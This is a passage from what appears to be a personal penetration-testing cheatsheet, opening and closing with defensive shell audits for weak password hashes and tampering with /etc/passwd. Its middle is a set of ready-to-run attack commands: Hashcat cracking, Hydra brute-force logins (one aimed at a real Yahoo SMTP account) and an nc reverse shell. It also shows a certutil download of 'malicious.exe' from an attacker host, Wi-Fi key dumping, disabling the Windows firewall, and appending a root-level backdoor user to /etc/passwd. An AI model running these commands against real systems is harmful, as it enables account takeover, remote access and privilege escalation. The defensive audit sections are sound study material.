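# Accounts whose hash is md5crypt or sha1crypt, or that have no password at all.
weak_hash_users() {
    audit_shadow "$1" | awk '$2 ~ /^(locked:)?(md5crypt|sha1crypt|empty)$/ { print $1 }'
}

# SAM-dump accounts that still store a real LM hash (LM hashing not disabled).
lm_enabled_users() {
    awk -F: -v e="$EMPTY_LM" 'NF >= 4 && $3 != "" && $3 != e { print $1 }' "$1"
}

# SAM-dump accounts whose NT hash is that of the empty string (blank password).
blank_nt_users() {
    awk -F: -v e="$EMPTY_NT" 'NF >= 4 && $4 == e { print $1 }' "$1"
}

audit_shadow "$WORK/shadow"
weak_hash_users "$WORK/shadow"      # legacy, nopass
lm_enabled_users "$WORK/sam.dump"   # legacyuser
blank_nt_users "$WORK/sam.dump"     # Guest
```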

Offline cracking tools: mimikatz, pwdump, fgdump, wce, L0phtCrack, OphCrack, RainbowCrack, Cain & Abel, John the Ripper, Hashcat

Online cracking tools: Aircrack-ng, pth-winexe, Brutus, Hydra, THC-Hydra, Medusa, Ncrack, Burp Suite Intruder

Websites for password cracking: (onlinehashcrack.com)

(hashkiller.io/listmanager) (incl. additional tools)

(hashes.com/en/decrypt/hash) (incl. additional tools)

(crackstation.net)

and also maybe helpful: CyberChef

  • common wordlists / dictionaries:
    − rockyou.txt in Kali Linux under /usr/share/wordlists/
    − https://github.com/danielmiessler/SecLists (many wordlists, not only passwords!)
    − weakpass.com/wordlist (many password dumps)
    − packetstormsecurity.com/Crackers/wordlists
Hashcat

hashcat -m 400 -a 0 -o wppass.txt --remove wp.hash /usr/share/wordlists/rockyou.txt ==> -m 400 selects the phpass hash mode (used by WordPress and phpBB3), -a 0 is a straight dictionary attack, -o writes the cracked results to wppass.txt and --remove deletes cracked hashes from wp.hash

Hydra

The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute force FTP with the username being user and a password list being passlist.txt, we’d use the following command:

hydra -l user -P passlist.txt ftp://MACHINE_IP

  • On SSH: hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh

    -l specifies the (SSH) username for login, -P indicates a list of passwords, -t sets the number of threads to spawn

  • On a POST web form you must know which type of request it makes; GET or POST are the common methods. sudo hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"

| Option | Description |
|---|---|
| -l | the username for (web form) login |
| -P | the password list to use |
| http-post-form | the form type is POST |
| <path> | the login page URL, for example login.php |
| <login_credentials> | the username and password fields used to log in, for example username=^USER^&password=^PASS^ |
| <invalid_response> | part of the response when the login fails |
| -V | verbose output for every attempt |

Below is a more concrete example Hydra command to brute force a POST login form:

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

  • The login page is only /, i.e., the main IP address.
  • username is the form field where the username is entered; the specified username(s) replace ^USER^
  • password is the form field where the password is entered; the provided passwords replace ^PASS^
  • Finally, F=incorrect is a string that appears in the server reply when the login fails

  • hydra -l email@yahoo.com -P passwortliste.lst -s 465 -S -v -V -t 1 smtp.mail.yahoo.com smtp
    [-s 465] the target port of the SMTP service; it is SMTPS, so its port is 465
    [-S] tells Hydra to use SSL/TLS for the connection, necessary for secure SMTP connections on port 465
    [-v] verbose
    [-V] enables even more verbose output, showing each attempt that Hydra makes


Reverse Shell and Web Shell

nc -e workaround

nc -nlvp 8080 netcat listening on port 8080

nc localhost 8080 netcat connecting to it

Because newer versions of nc have no -e or -c option, here is a workaround (from the OpenBSD nc man page) to pass a shell through nc. On the 'server' side:

       $ rm -f /tmp/f; mkfifo /tmp/f
       $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f

 On the 'client' side:

       $ nc host.example.com 1234
       $ (shell prompt from host.example.com)

more on that see (https://manpages.ubuntu.com/manpages/bionic/man1/nc_openbsd.1.html)

  • Port 53 is rarely blocked on the firewalls of victim machines. It is perfect for listening in a reverse shell.
  • Reverse Shell Generator

Upgrade to a pseudo-TTY terminal:

       python -c 'import pty;pty.spawn("/bin/bash")'
       ^Z
       stty raw -echo; fg
       export TERM=xterm

Where: Ctrl + Z suspends the terminal process (moves it to the background); stty controls the terminal settings so that the terminal passes its input raw (byte by byte) and does not handle Ctrl + C or Ctrl + D itself but hands them to the program; TERM=xterm allows things like clearing the screen

Post Exploitation

File Transfer
  • Tools: wget, nc, ftp, certutil, …
  • With scripts: VBScript, PowerShell, Python
  • Encoding/Decoding

− Example of encoding/decoding a KeePass database: in PowerShell [convert]::ToBase64String((Get-Content -path "C:\users\bob\documents\Database.kdbx" -Encoding byte)) and in Linux:

echo "<base64 string produced by the command above>" | base64 -d > database.kdbx
Privilege Escalation

GTFOBins, LOLBAS. certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe download a file in cmd using a living-off-the-land binary

netsh wlan show profile show all wireless profiles stored on the computer. These profiles contain saved SSIDs (network names), security settings, and keys (passwords).

netsh wlan show profile name="HomeNetwork" key=clear display the password of a specific network

netsh advfirewall set allprofiles state off disable the Windows Firewall for all profiles Note needs admin rights

setuid Privilege Escalation

SUID, GUID and Sticky Bit

Real, Effective and Saved User ID

find / -user root -perm -4000 -print 2>/dev/null find all files owned by root that have the setuid bit set

find / -perm /6000 -type f 2>/dev/null | grep "/bin" grab binaries with the setuid or setgid bit set. Note the older form -perm +6000 is deprecated; use -perm /mode instead

Misconfigured file permissions example

find / -type f -perm 0777 -> /etc/passwd

ls -l /etc/passwd -> -rwxrwxrwx ...

mkpasswd --method=md5 --salt=vb1tLY1l PASSWORD generate an MD5-hashed password with a custom salt

cat new_passwd >> /etc/passwd the file new_passwd contains a line like: eviluser:$1$vb1tLY1l$If2W7VheNl4T1y7DZJPnQ/:0:0::/root:/bin/bash, i.e. a UID 0 account whose hash is placed directly in the password field instead of in /etc/shadow
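Added example (not from the original cheatsheet) showing the defender's side of the misconfiguration just described: a shell audit over a constructed passwd file that flags world-writable permissions, extra UID 0 accounts and entries that carry a hash directly in the password field instead of the x placeholder. The function names and the sample file are my own; the eviluser line is the one from the text.

```shell
# Added example, not from the original cheatsheet: detect the /etc/passwd
# abuse described above. The passwd content is constructed.
WORK=$(mktemp -d)

cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
eviluser:$1$vb1tLY1l$If2W7VheNl4T1y7DZJPnQ/:0:0::/root:/bin/bash
EOF

# Octal permission bits of a file: GNU stat first, BSD stat as fallback.
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# "yes" if the file is writable by others (the last octal digit has bit 2 set).
world_writable() {
    case "$(file_mode "$1")" in
        *[2367]) echo yes ;;
        *)       echo no ;;
    esac
}

# Accounts other than root with UID 0: every one of them is a root account.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose password field holds a hash instead of the "x" (or "*")
# placeholder, i.e. the password lives in passwd and bypasses /etc/shadow.
inline_hash_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "" { print $1 }' "$1"
}

# One line per finding; exit status 1 if anything was found.
audit_passwd() {
    found=0
    if [ "$(world_writable "$1")" = yes ]; then
        echo "FINDING: $1 is world-writable (mode $(file_mode "$1"))"; found=1
    fi
    for u in $(uid0_accounts "$1"); do
        echo "FINDING: extra UID 0 account: $u"; found=1
    done
    for u in $(inline_hash_accounts "$1"); do
        echo "FINDING: password hash stored directly in passwd for: $u"; found=1
    done
    return $found
}

chmod 777 "$WORK/passwd"          # reproduce the -rwxrwxrwx misconfiguration
audit_passwd "$WORK/passwd" || echo "audit failed: review the findings above"
```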

Other good cheatsheets
